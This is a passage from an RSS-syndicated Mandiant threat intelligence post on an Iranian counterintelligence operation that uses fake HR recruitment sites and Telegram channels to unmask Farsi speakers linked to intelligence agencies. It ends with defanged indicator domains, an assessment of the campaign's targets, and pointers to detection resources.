style="vertical-align: baseline;">dreamy-job[.]com (Farsi)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">damavand-hr[.]me (Arabic)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">wazayif-halima[.]org (Arabic)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">optima-hr[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">joinoptimahr[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">opthrltd[.]me</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">beparas[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">darakeh[.]me</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">topwor4u[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Contact Details</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/wazayif_IL</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/joinchat/<br/>AAAAAFgDeSXaWr2r_AQImw</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">+972 (Israel) phone numbers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/PhantomIL13</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/getDmIL</span></p>
<p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/joinchat/<br/>AAAAAFgDeSXaWr2r_AQImw</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">Outlook and Implications</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant estimates this activity supports Iranian counterintelligence efforts to identify individuals affiliated (or interested in working) with intelligence and security agencies.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Specifically, the activities described in this blog post are of concern to Iranian individuals who are suspected to be collaborating with countries Iran might perceive as adversaries. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The campaign casts a wide net by operating across multiple social media platforms to disseminate its network of fake HR websites in an attempt to expose Farsi-speaking individuals who may be working with intelligence and security agencies and are thus perceived as a threat to Iran’s regime. 
The collected data, such as addresses, contact details, as well as professional and academic experience, might be leveraged in future operations against the targeted individuals.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Additional Protection Information for Google Cloud Customers</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">For Google Chronicle Enterprise+ customers, Chronicle rules have been released to the </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span style="text-decoration: underline; vertical-align: baseline;">Emerging Threats</span></a><span style="vertical-align: baseline;"> rule pack, and IOCs listed in this blog post are available for prioritization with </span><a href="https://cloud.google.com/chronicle/docs/detection"><span style="text-decoration: underline; vertical-align: baseline;">Applied Threat Intelligence</span></a><span style="vertical-align: baseline;">.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">A <a href="https://www.virustotal.com/gui/collection/a69216a9f3c5422892aeacb87da52953c9e114690b293d57011a0caf4e1be1c0" rel="noopener" target="_blank">Google Threat Intelligence Collection</a> featuring IOCs related to the activity described in this post is now available for registered users.</span></p></description><pubDate>Wed, 28 Aug 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</guid><category>Threat 
Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item></channel></rss>